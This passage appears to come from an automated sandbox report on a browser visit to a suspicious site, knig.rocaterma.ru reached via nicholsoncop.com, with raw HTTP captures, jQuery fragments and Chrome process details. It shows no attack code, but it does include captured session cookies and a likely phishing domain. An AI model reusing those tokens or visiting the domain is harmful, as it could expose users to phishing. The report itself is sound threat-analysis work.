                                2025-03-24 23:59:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                2025-03-24 23:59:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.649709172.67.194.2164434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:42 UTC1326OUTGET /favicon.ico HTTP/1.1
                                Host: knig.rocaterma.ru
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                sec-ch-ua-mobile: ?0
                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                Sec-Fetch-Site: same-origin
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: image
                                Referer: https://knig.rocaterma.ru/krVkG/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnYiLCJtYWMiOiI4YzQyZDE4MDcyYmU5NmNiNTk3YzUwOGRkYjllOGNiMjA2N2I2MWI0MzJmODJjOWI2MzQ2NjdmZDNhMDFlODMxIiwidGFnIjoiIn0%3D
                                2025-03-24 23:59:43 UTC1068INHTTP/1.1 404 Not Found
                                Date: Mon, 24 Mar 2025 23:59:43 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                server-timing: cfL4;desc="?proto=TCP&rtt=35119&min_rtt=35008&rtt_var=13207&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2236&delivery_rate=81352&cwnd=252&unsent_bytes=0&cid=87cb41bd4521fd5f&ts=395&x=0"
                                Cache-Control: max-age=14400
                                CF-Cache-Status: EXPIRED
                                Server: cloudflare
                                CF-RAY: 925a1fb69914c64a-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=96202&min_rtt=96048&rtt_var=20385&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=38769&cwnd=226&unsent_bytes=0&cid=cee02409b072dd4f&ts=831&x=0"
                                2025-03-24 23:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.64971135.190.80.14434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:44 UTC546OUTOPTIONS /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1
                                Host: a.nel.cloudflare.com
                                Connection: keep-alive
                                Origin: https://knig.rocaterma.ru
                                Access-Control-Request-Method: POST
                                Access-Control-Request-Headers: content-type
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-03-24 23:59:44 UTC336INHTTP/1.1 200 OK
                                Content-Length: 0
                                access-control-max-age: 86400
                                access-control-allow-methods: POST, OPTIONS
                                access-control-allow-origin: *
                                access-control-allow-headers: content-type, content-length
                                date: Mon, 24 Mar 2025 23:59:44 GMT
                                Via: 1.1 google
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.64971235.190.80.14434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:44 UTC521OUTPOST /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1
                                Host: a.nel.cloudflare.com
                                Connection: keep-alive
                                Content-Length: 432
                                Content-Type: application/reports+json
                                Origin: https://knig.rocaterma.ru
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-03-24 23:59:44 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 6e 69 67 2e 72 6f 63 61 74 65 72 6d 61 2e 72 75 2f 6b 72 56 6b 47 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 39 34 2e 32 31 36 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                Data Ascii: [{"age":0,"body":{"elapsed_time":1028,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://knig.rocaterma.ru/krVkG/","sampling_fraction":1.0,"server_ip":"172.67.194.216","status_code":404,"type":"http.error"},"type":"network-erro
                                2025-03-24 23:59:44 UTC214INHTTP/1.1 200 OK
                                Content-Length: 0
                                access-control-allow-origin: *
                                vary: Origin
                                date: Mon, 24 Mar 2025 23:59:44 GMT
                                Via: 1.1 google
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.649695142.251.41.44434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:44 UTC487OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                Host: www.google.com
                                Connection: keep-alive
                                X-Client-Data: CO6MywE=
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-03-24 23:59:44 UTC1303INHTTP/1.1 200 OK
                                Date: Mon, 24 Mar 2025 23:59:44 GMT
                                Pragma: no-cache
                                Expires: -1
                                Cache-Control: no-cache, must-revalidate
                                Content-Type: text/javascript; charset=UTF-8
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JwJPfktAcAPNdZ5pmi0Bxg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                Accept-CH: Downlink
                                Accept-CH: RTT
                                Accept-CH: Sec-CH-UA-Form-Factors
                                Accept-CH: Sec-CH-UA-Platform
                                Accept-CH: Sec-CH-UA-Platform-Version
                                Accept-CH: Sec-CH-UA-Full-Version
                                Accept-CH: Sec-CH-UA-Arch
                                Accept-CH: Sec-CH-UA-Model
                                Accept-CH: Sec-CH-UA-Bitness
                                Accept-CH: Sec-CH-UA-Full-Version-List
                                Accept-CH: Sec-CH-UA-WoW64
                                Permissions-Policy: unload=()
                                Content-Disposition: attachment; filename="f.txt"
                                Server: gws
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Accept-Ranges: none
                                Vary: Accept-Encoding
                                Connection: close
                                Transfer-Encoding: chunked
                                2025-03-24 23:59:44 UTC1303INData Raw: 63 65 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 66 69 6e 63 65 6e 20 62 65 6e 65 66 69 63 69 61 6c 20 6f 77 6e 65 72 73 68 69 70 22 2c 22 70 6f 77 65 72 62 61 6c 6c 20 77 69 6e 6e 69 6e 67 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 22 2c 22 6e 62 61 22 2c 22 73 6f 6c 61 72 20 65 63 6c 69 70 73 65 22 2c 22 6e 65 77 6a 65 61 6e 73 20 68 69 61 74 75 73 22 2c 22 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 66 6f 72 65 63 61 73 74 22 2c 22 74 65 73 6c 61 20 73 74 6f 63 6b 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a
                                Data Ascii: ce0)]}'["",["fincen beneficial ownership","powerball winning lottery numbers","apple iphone 17","nba","solar eclipse","newjeans hiatus","northern lights aurora borealis forecast","tesla stocks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":
                                2025-03-24 23:59:44 UTC1303INData Raw: 56 4e 31 56 30 4e 48 55 77 57 6b 46 75 4d 33 41 35 61 47 4e 73 51 31 67 78 54 56 42 50 61 30 70 54 56 6b 52 6b 62 6b 4a 33 62 6d 63 72 52 30 73 31 63 58 64 76 56 54 52 51 5a 32 73 34 64 55 64 6f 4d 56 4e 75 56 33 46 55 57 45 59 31 52 6e 59 35 63 48 51 31 59 32 6f 7a 63 55 78 49 64 46 5a 33 61 33 4e 50 65 44 4a 71 4b 30 6c 54 64 79 74 30 53 58 6c 6a 52 6b 6c 4a 51 6e 68 75 52 32 5a 4a 61 6b 35 61 54 33 5a 51 4e 48 56 45 54 6a 6c 6f 52 6e 4e 77 56 56 70 54 63 56 4a 55 56 44 42 36 55 7a 68 54 61 32 46 33 51 30 68 4b 54 6e 5a 74 61 48 52 44 53 48 42 7a 52 6b 51 33 4b 33 68 4a 51 56 55 31 64 6c 64 72 63 58 64 50 51 6d 35 68 51 32 4e 6b 55 32 45 77 4d 6b 59 78 53 6c 5a 4d 5a 45 39 59 53 58 68 74 54 6c 56 4a 56 55 78 35 56 55 6c 4d 53 6b 56 45 56 6d 64 57 53 57
                                Data Ascii: VN1V0NHUwWkFuM3A5aGNsQ1gxTVBPa0pTVkRkbkJ3bmcrR0s1cXdvVTRQZ2s4dUdoMVNuV3FUWEY1RnY5cHQ1Y2ozcUxIdFZ3a3NPeDJqK0lTdyt0SXljRklJQnhuR2ZJak5aT3ZQNHVETjloRnNwVVpTcVJUVDB6UzhTa2F3Q0hKTnZtaHRDSHBzRkQ3K3hJQVU1dldrcXdPQm5hQ2NkU2EwMkYxSlZMZE9YSXhtTlVJVUx5VUlMSkVEVmdWSW
                                2025-03-24 23:59:44 UTC697INData Raw: 5a 6c 4d 46 42 69 4e 55 56 45 56 6d 39 56 57 57 39 43 55 55 4e 6e 53 6e 70 54 55 7a 42 48 57 6b 35 6f 63 6d 4e 52 4d 6e 56 6b 51 57 56 70 63 33 46 58 63 6b 4e 6c 4d 46 56 42 56 57 64 75 63 47 74 71 53 47 35 56 5a 54 56 55 4d 6c 5a 4d 62 7a 42 35 56 47 4a 4f 59 6c 52 71 4d 56 64 53 5a 53 38 31 5a 33 56 71 59 6b 4e 4a 4e 33 56 73 54 48 68 31 57 56 4e 46 57 6c 4a 48 53 6a 4e 69 5a 58 6c 51 5a 6e 52 51 56 6e 4e 71 59 30 39 52 51 30 4e 50 55 6c 5a 6d 64 55 6c 4f 4e 58 46 76 64 56 42 36 4b 33 5a 78 56 44 6b 33 54 45 78 4d 57 57 59 33 61 32 56 4e 59 31 52 4d 4e 55 6c 72 54 58 46 7a 5a 48 68 30 65 6c 52 6b 62 32 74 53 4d 45 59 72 54 33 5a 44 4b 31 56 47 62 30 52 71 4d 32 64 52 56 47 6f 77 63 6e 68 31 63 57 4e 57 55 57 74 30 63 45 35 30 4f 48 5a 46 62 44 52 6d 56
                                Data Ascii: ZlMFBiNUVEVm9VWW9CUUNnSnpTUzBHWk5ocmNRMnVkQWVpc3FXckNlMFVBVWducGtqSG5VZTVUMlZMbzB5VGJOYlRqMVdSZS81Z3VqYkNJN3VsTHh1WVNFWlJHSjNiZXlQZnRQVnNqY09RQ0NPUlZmdUlONXFvdVB6K3ZxVDk3TExMWWY3a2VNY1RMNUlrTXFzZHh0elRkb2tSMEYrT3ZDK1VGb0RqM2dRVGowcnh1cWNWUWt0cE50OHZFbDRmV
                                2025-03-24 23:59:44 UTC289INData Raw: 31 31 61 0d 0a 22 3a 5b 31 32 35 31 2c 31 32 35 30 2c 38 30 35 2c 38 30 34 2c 38 30 33 2c 38 30 32 2c 38 30 31 2c 38 30 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51
                                Data Ascii: 11a":[1251,1250,805,804,803,802,801,800],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","ENTITY","Q
                                2025-03-24 23:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                020406080s020406080100

                                Click to jump to process

                                020406080s0.0050100MB

                                Click to jump to process

                                Target ID:1
                                Start time:19:59:24
                                Start date:24/03/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                Imagebase:0x7ff63b000000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:2
                                Start time:19:59:30
                                Start date:24/03/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
                                Imagebase:0x7ff63b000000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:false

                                Target ID:6
                                Start time:19:59:36
                                Start date:24/03/2025
                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/"
                                Imagebase:0x7ff63b000000
                                File size:3'388'000 bytes
                                MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                No disassembly